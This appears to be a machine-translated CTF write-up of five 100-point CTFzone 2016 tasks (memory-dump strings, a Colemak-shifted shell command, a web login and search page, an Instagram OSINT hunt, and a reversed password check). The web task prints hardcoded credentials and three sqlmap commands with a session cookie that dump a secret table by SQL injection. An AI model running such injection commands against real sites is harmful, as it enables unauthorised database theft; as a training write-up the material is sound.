[ZeroNights2016] [CTFzone] Without 100 grams you will not understand

We continue the series of articles devoted to the WTA on CTFzone, which took place on November 17 and 18 within the framework of ZeroNights2016 under the flag of Bi.Zone. This time we will talk about tasks, the execution of which brought 100 points in favor of real hackers!


Special thanks to GH0st3rs for providing some of the assignments to the raytps.

FORENSIC100 - Master of Strings

Rise and shine, stop dreaming of drinking and playing with the bear. AURORA is not speaking at your workplace. If you couldn’t go to the bottom of the world, you couldn’t ... The man in the wrong place can change the world. Find out what you want to do.

A 7z archive with the '.RAM' file was attached to the task. Logically, it is necessary to analyze the cast of RAM. It was decided to look in the direction of 'Volatility'. Once again (two / three), after reading the assignment and scrolling through the Volatility Wiki, you could notice the “Strings” section and see the link to SysInternals Strings . Of course, we use it:
')

strings.exe task_forensic_100.ram > output 

We get output on ~ 70MB from UNICODE strings longer than 3 characters (by default). Opening it with a text editor, I went in search of the flag, - "What if?". What was my surprise:


As it turned out later: my option to receive the flag was not the way the “author” had planned it. Well, well, maybe even better.

MISC100 - Nerdy Mechanic

AURORA: Lieutenant, let me introduce you to Sergeant Varvara. She needs your help.
Sergeant Varvara: Lieutenant, this terminal is not working. There is some gibberish on the screen. This is a mechanic. Would you take a look?

Below, we are provided with the same "curve" output from the terminal:

 why ir -iagp irbie -t cifap iw;-pfqlfrg -sfm DFG gukjlpi.cym/dnwalwbw pfrfg 

What to do with it? Let's take a closer look: the end of the fifth line is very similar to the link. However, you need to replace: 'y' -> 'o'. Then in the first line, 'why' turns into 'who' - Aha! - Obviously, this is the Bash interpreter. Maybe in this task there was a certain logic of letter substitution, however, having scribbled a simple script in Python using the sample method, the solution came by itself:

 print(text.replace('y','o').replace('j','y').replace('n','j').replace('k','n').replace('u','v').replace('l','u').replace('i','l').replace('r','s').replace('e','k').replace('f','e').replace('p','r').replace('g','t').replace('G','T').replace(';','p').replace('d','g').replace('D','G').replace('F','E').replace('v','i')) 

The result was the following:

 who ls -latr lsblk -t clear lwp-request -sem GET tinyurl.com/gjwauwbw reset 

Follow the link and see the flag: ctfzone {182ac24a3b2dc86ba298f57d9c391c0b}

PS> From sources it became known that the original algorithm for replacing letters in a given ciphertext is the use of Colemak .

WEB100 - Search Engine

Lieutenant (You): AURORA, I'm in the SNT-47 compartment, in the general-purpose room. Thermal signatures are missing. I need to find out what I need?
AURORA: AURORA Please name your identification number.
You: What identification number ?! Are you broken as well ?? I’m not sure to stay here forever ...

A reference to the site with the authorization form was attached to the task:



Where to begin? Correct: from the search by the source code of the page. We go there and observe:

 <script src=/static/js/pewpew.js type="text/javascript"></script> 

We open, we look:

 if ('s3cr3tuser' === $(ctrls[0]).find('input').val() && 'v3rySTr0ngP@ss' === $(ctrls[1]).find('input').val()) { 

With the naked eye, we understand what's what. We return to the authorization form and go on. Before us opens a page with a single search string. “Isn't SQLi an hour here?” Should be heard in my head. We go to check: bingo!


Well, we uncover the good old SqlMap (of course, it is possible with our hands). Do not forget that we made the authorization => you need to specify cookies. In order to save local space, the “output” is not complete:

 root@hackzard:~# sqlmap -u "http://78.155.219.6/search/param1*" --cookie="session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzZkhXekRTd09WSVlQR0oifQ.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg" --level=3 --dbms=MySQL --tables 

 root@hackzard:~# sqlmap -u "http://78.155.219.6/search/param1*" --cookie="session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzZkhXekRTd09WSVlQR0oifQ.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg" --level=3 --dbms=MySQL -D "sqli_100" -T "wtf3thisiss3crettable_dont_read_dont_touch" --columns 

 root@hackzard:~# sqlmap -u "http://78.155.219.6/search/param1*" --cookie="session=eyJ1c2VybmFtZSI6InMzY3IzdHVzZXJzZkhXekRTd09WSVlQR0oifQ.Cw6t3A.obdrULM4zqHM6FlQcQh_uaPtgmg" --level=3 --dbms=MySQL -D "sqli_100" -T "wtf3thisiss3crettable_dont_read_dont_touch" -C "secret" --dump 

We are asked not to forget the format of the flag, because it is in this table. And here he is:

ctfzone {089b1d5d37c22d81b55b6f77c9e2b042}

OSINT100 - Weird Guy

AURORA: ZERONIGHTS 2016. He was absorbed in reading something on his laptop. We were not looking at the screen. This photo might help you.

A picture was attached to the task:


In the photo we can observe how one person takes a picture of another, and also notice that the desired screen falls into the area of ​​the photo. The task is clear: you must find a photo from the right angle. Given that this CTF is international in nature, we ask ourselves the question: “Which site do we need?”. Correct - Instagram. Further, this task would have two solutions:

• Realizing that the photography took place in the framework of ZeroNights2016 in the territory of the Cosmos Group of Companies - use the search by GeoTags. Unfortunately, the moment refused to work, due to the uncertain changes in the Instagram API;
• Through trial and error, go through all the # hashtags that are somehow related to CTF, Bi.Zone or ZeroNights as a whole.

After some time (using the second method), the desired hashtag was found: # zn2016. And here is the desired photo:



Flag: ctfzone {Os1nT_G4nGsT3r}

REVERSE100 - The Doors Of Dorun

** AURORA: ** Lieutenant, your co-pilot was abducted by prison. They are out for free! Doors couldn’t be seen.
The inscription on the archivolt read:
“The Doors of Dorun, Lord of Omega. Speak, friend, and enter. I, Norvy, made them. Calabrimbor of Alpha Centauri drew these signs. ”
But be careful and hurry up. They can be back any moment.

A file was attached to the task, when started, a window appeared with a field for entering a password. If the password is incorrect, then an error occurred:


Well, well, turn it inside out! Disassemble and re-see, already familiar to us from the past assignment (REVERSE50), function: DialogFunc, by offset: 13F7C1040. Look further and find:


At this section of the code, the entered password is received, and then passed to the function (let's call it: PassVerify), and in case of an incorrect result:

jz short loc_13F7C1126

takes us to a code section that signals an error:


Let's go to the function: PassVerify and see what happens there. We see a check of the length of the phrase we entered - 4 characters.


Then, the password is divided into 2 parts of 2 characters:


Next begins filling the stack with values ​​for matching. And, starting from the address: 13F7C1330, the verification of the entered password begins:


Let's use the HexRays plugin and get this code:


So what do we have? In "v3" is the first part of the password, and in "v5" - the second. If we convert this cycle, we get the following condition (Python):

 v8 = [0, 0, 1, 241, 995, 0, 1, 4, 6, 104, 413, 0] if (v3%3==v8[0] and v3%5==v8[1] and v3%17==v8[2] and v3%257==v8[3] and v3%65537==v8[4]) or (v5%3==v8[6] and v5%5==v8[7] and v5%17==v8[8] and v5%257==v8[9] and v5%65537==v8[10]) 

Everyone chose the solution to this equation for himself. However, we are not looking for easy ways and we will use the Chinese theorem on residuals (the script of which remains from NeoQuest2016 ):


We use:

 hex(chinese_remainder([3,5,17,257,65537],[v8[0],v8[1],v8[2],v8[3],v8[4]])) 

Conclusion: 0xa028a40b

We use:

 hex(chinese_remainder([3,5,17,257,65537],[v8[6],v8[7],v8[8],v8[9],v8[10]])) 

Output: 0xa288a425

We received character codes. The next step is to visit this site and search for the corresponding characters by the known HEX values. We get: ꐋꀨꐥꊈ. Try this password - Profit!

---

We will continue this series of articles, where we consider the solutions of the remaining tasks of CTFzone 2016.
Stay with us!